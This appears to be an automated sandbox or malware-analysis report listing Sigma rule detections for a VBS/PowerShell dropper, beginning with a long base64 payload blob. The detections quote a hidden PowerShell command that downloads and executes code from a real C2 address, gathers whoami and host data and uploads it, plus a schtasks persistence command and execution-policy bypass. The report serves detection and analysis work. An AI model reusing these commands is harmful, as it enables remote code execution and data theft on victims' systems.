$temp='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
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ProcessId: 1056, ProcessName: wscript.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3540, TargetFilename: C:\Users\Public\Libraries\Libraries.vbs
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3540, TargetFilename: C:\Users\Public\Libraries\Libraries.vbs
              Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1056, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}, ProcessId: 3380, ProcessName: powershell.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1056, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}, ProcessId: 3380, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ProcessId: 1056, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJZJTpOBTpNnZZggQnEIDCjQ6mkQJ/fMiWOVu/jAoF04l8WjgpvUsTu6Dk5Ox67qoywarP39CP5Yvq2HUUOp+VRxIVQiecwsMW1sV9BL4WoDjVhr0Kx/FK8Ljhul65/dTgQ7fVoNlovrNN8zh0t/RRoJ4PPqMG9xpE7k6cYEfIR8HPkvv2dPzekGqNE6zMJ6FcbZOs/x+5r/Pvul1wNDZwl72T6VKhqYT7E/tdl/fwHEcaQK+RokNjPS5/Pd8ql9QSwcI1kKz4VIBAACKAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAQAAAAZG9jUHJvcHMvYXBwLnhtbJ1R0W6DIBR931cYs9eKUrW2oTTLlj01WZO5dm8N4lVZFAjQpv37sTZzPg9e7rnncA5wyeYy9MEZjBVKrsMkisMAJFe1kO06/ChfZ0UYWMdkzXolYR1ewYYb+kB2RmkwToANvIO067BzTq8QsryDgdnI09IzjTIDcx6aFqmmERxeFD8NIB3CcZwjuDiQNdQzPRqGd8fV2f3XtFb85352X16196OkhEH3zAEl6K8slWN9KQagsW+PgDxp3QvOnP8RuhWVgbdbBFpEmd/4cSvk6XL8LPJjngYTwdE/4Qu4Q5wVDSxSnOIcF3HWYDyvlgzP52nFF0mRsKriVZMBQdOon9z9fRA0yaLYr5vgt0d2rAVLMUH3ghyUqS1NigVB95I8d8ww7vwBmuS5V04aE/IgXPeuGfcmyTJJp7IJ5fMMaw3TnaXpLXWEHozTot9QSwcILVvKq0sBAABDAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAcAAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc62RTQrCMBCF954izN6mVRCRpm5EcCv1ADGdtsE2CckoensDiloo4sLl/H3vMS9fX/uOXdAHbY2ALEmBoVG20qYRcCi30yWsi0m+x05SXAmtdoHFGxMEtERuxXlQLfYyJNahiZPa+l5SLH3DnVQn2SCfpemC+08GFAMm21UC/K7KgJU3h7+wbV1rhRurzj0aGpHggW4dhkiUvkES8KiTyAE+Lj/7p3xtDZXy2OHbwav1zcT8rz9Aopjl5xeenaeFSc4H4RZ3UEsHCPkvMMDFAAAAEwIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAHdvcmQvZG9jdW1lbnQueG1s7V1bb9tGFn7fXzHQQ7ELKBJ1sSyrlYtugnQDpEFQp+hjQFGUxF1S1JKUZffJjpqkBYI6yAYukL2kwS5291H2RrUSXwrsLxj+hf0le84MSV0sJbZkxyI1TiuSM3MOZ4bfmXPmduaTTzcMnayrlq2Z9WIslZBiRK0rZlmrV4uxr+7dvJaPEduR62VZN+tqMbap2rFPV3/1SatQNpWmodYdAhzqdsEsxppWvWArNdWQ7WuGplimbVaca4ppFMxKRVNU7xLzKKxirOY4jUIy6RElzIZah7iKaRmyA49WNclJbnjvSqYlKZe0VF12IL92TWvYPrf1d71/3dD9dK2zvLVlWuWGZSqqbUNFGDp/ryFr9YBNSjpDgZFPQNE4y5vLltwaeOVwRm7wyD5H+xTLIBsJyIZXe4wL8EtJI/zWanJD7XOrzsbtc8tsNnxuhnKW0hqy9YdmA2usAV+0pOmas8kK3s9UKjtbrkbrbDp+A/hJLZ2PQTpgYCiFW9W6acklHSQJckKweAQ4xlZBoEpmeROvDfZz12KXNWdTV0mrsC7rxdgdrDo9lmSptbLmh0s8yG7IChQVQnWtrn7ZxLeoG7LixLygYiydlfChpMJXUJEQHuSKo1oBE61extRqxfGiLa1a8+9rcr3KWgYv8e8VPwsKSKdq8VCL5926adYdG19gK5pWjN3TDNUmd9QW+dI05Drj91ndHh+jyrbzma3JYyMV+3QwrxT2q5i6afkZk5uOOVo9Q5X2jR+QznshNayBiqb71EEZdVVmRUx6ZUwG38kaV+5zl2GauppUbon9XVbJWwVnlb5y2/Q1PaH7tEPoL3jj7rrb7gP6lgW4W/SEQGQPng/xl2BqAimAzG0jL4dz5DUpsC+wHxrs7wOOGcQ7iHriPgKAww09dJ/QY7i+iROIek2P4P6YiwUmBuGAdEEKT0bekZB2if8aEDAQMnfLbbvf0S5EHbs7ccLIvkN+QqAuVqC0gd9pxSobWrEaU+5zidW5S47g/TVDOAgA4H